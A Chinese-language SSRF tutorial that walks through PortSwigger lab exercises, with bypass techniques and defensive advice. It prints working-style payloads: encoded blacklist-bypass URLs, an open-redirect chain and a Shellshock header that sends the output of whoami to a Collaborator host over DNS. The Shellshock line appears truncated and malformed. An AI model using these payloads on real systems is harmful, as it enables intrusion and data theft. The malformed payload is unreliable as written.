SSRF漏洞详解与PortSwigger靶场实战指南<\/h1>

一、SSRF漏洞概述<\/h2>
SSRF（Server-Side Request Forgery，服务端请求伪造）是一种安全漏洞，允许攻击者操纵服务器向非预期目标发起请求。这种漏洞通常发生在应用程序从用户提供的URL获取数据时，服务器未对目标地址进行充分验证的情况下。<\/p>

SSRF分类<\/h3>

普通SSRF<\/strong>：攻击者能够直接看到服务器返回的响应<\/li>

Blind SSRF<\/strong>：攻击者无法直接看到响应，但服务器确实发起了请求<\/li> <\/ol>
二、SSRF常见利用场景<\/h2>

访问服务器本地的服务（如localhost）<\/li>
探测内部网络中的其他主机和服务<\/li>
绕过身份验证和访问控制<\/li>
与服务器端其他漏洞结合利用<\/li> <\/ol>
三、SSRF绕过技术<\/h2>
当目标使用黑名单机制防护SSRF时，可使用以下方法绕过（以127.0.0.1\/localhost为例）：<\/p>

IP地址表示方式转换<\/strong>：<\/p>

十进制表示：2130706433<\/li>
八进制表示：017700000001<\/li>
缩写形式：127.1<\/li> <\/ul> <\/li>

域名解析<\/strong>：<\/p>

注册自己的域名解析为127.0.0.1<\/li>
使用Burp Collaborator提供的spoofed.burpcollaborator.net<\/li> <\/ul> <\/li>

URL编码<\/strong>：<\/p>

对请求URL进行单重或多重URL编码<\/li> <\/ul> <\/li> <\/ol>
四、PortSwigger靶场实战<\/h2>
Lab1：基本本地SSRF利用<\/h3>
目标<\/strong>：访问http:\/\/localhost\/admin，删除carlos账户<\/p>
步骤<\/strong>：<\/p>

观察Burp Suite的HTTP历史记录，寻找可能的SSRF点<\/li>
尝试直接请求http:\/\/localhost\/admin<\/li>
发现返回admin页面但浏览器删除操作受限<\/li>
通过Burp构造直接删除请求：
POST \/admin\/delete HTTP\/1.1 Host: localhost Content-Type: application\/x-www-form-urlencoded username=carlos <\/code><\/pre> <\/li> <\/ol> Lab2：内网服务探测<\/h3> 目标<\/strong>：探测192.168.0.0\/24网段中的服务，删除carlos账户<\/p> 步骤<\/strong>：<\/p> 发现类似Lab1的SSRF漏洞点<\/li> 使用Burp Intruder对192.168.0.1-254进行扫描<\/li> 发现192.168.0.160返回200状态码<\/li> 构造针对该IP的admin删除请求<\/li> <\/ol> Lab3：基于Referer头的Blind SSRF<\/h3> 目标<\/strong>：在服务端发起DNS查询<\/p> 步骤<\/strong>：<\/p> 生成Burp Collaborator随机子域名<\/li> 修改商品详情请求的Referer头为Collaborator地址<\/li> 观察Collaborator是否收到请求<\/li> <\/ol> Lab4：黑名单绕过<\/h3> 目标<\/strong>：绕过黑名单访问http:\/\/localhost\/admin<\/p> 技巧<\/strong>：<\/p> 尝试直接请求被阻止<\/li> 使用127.1代替127.0.0.1<\/li> 对路径部分进行URL编码：一次编码：%61dmin<\/li> 二次编码：%2561dmin<\/li> <\/ul> <\/li> 最终有效payload： http%3a%2f%2f127.1%2f%2561dmin%2fdelete%3fusername%3dcarlos <\/code><\/pre> <\/li> <\/ol> Lab5：开放重定向结合SSRF<\/h3> 目标<\/strong>：访问http:\/\/192.168.0.12:8080\/admin<\/p> 步骤<\/strong>：<\/p> 发现\/product\/nextProduct存在开放重定向漏洞<\/li> 构造payload： \/product\/nextProduct?currentProductId=7&path=http:\/\/192.168.0.12:8080\/admin\/delete?username=carlos <\/code><\/pre> <\/li> URL编码后作为stockApi参数值<\/li> <\/ol> Lab6：Blind SSRF与Shellshock结合<\/h3> 目标<\/strong>：探测192.168.0.0\/24网段8080端口，利用Shellshock获取OS用户名<\/p> 步骤<\/strong>：<\/p> 使用Collaborator Everywhere插件<\/li> 将域名添加到Target Scope<\/li> 发现User-Agent和Referer字段存在SSRF<\/li> 设置User-Agent为Shellshock payload： ()usr\/bin\/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN <\/code><\/pre> <\/li> 通过DNS查询结果获取用户名<\/li> <\/ol> Lab7：高级绕过技巧<\/h3> 有效payload<\/strong>：<\/p> stockApi=http:\/\/localhost:80%2523@stock.weliketoshop.net\/admin\/delete?username=carlos <\/code><\/pre> 技巧<\/strong>：使用URL编码的#(%23)来截断域名解析<\/p> 五、防御措施<\/h2> 实施严格的白名单机制而非黑名单<\/li> 验证用户提供的所有URL<\/li> 禁用不需要的URL协议（如file:\/\/, ftp:\/\/）<\/li> 对内部服务实施网络层隔离<\/li> 使用独立的认证机制保护内部服务<\/li> <\/ol> 六、工具推荐<\/h2> Burp Suite Professional<\/strong>：用于拦截、修改和重放请求<\/li> Burp Collaborator<\/strong>：用于检测Blind SSRF<\/li> Collaborator Everywhere<\/strong>：自动化检测潜在的SSRF漏洞点<\/li> <\/ol> 通过系统学习这些案例和技术，您将能够有效识别和利用SSRF漏洞，同时也能更好地防御此类安全威胁。<\/p>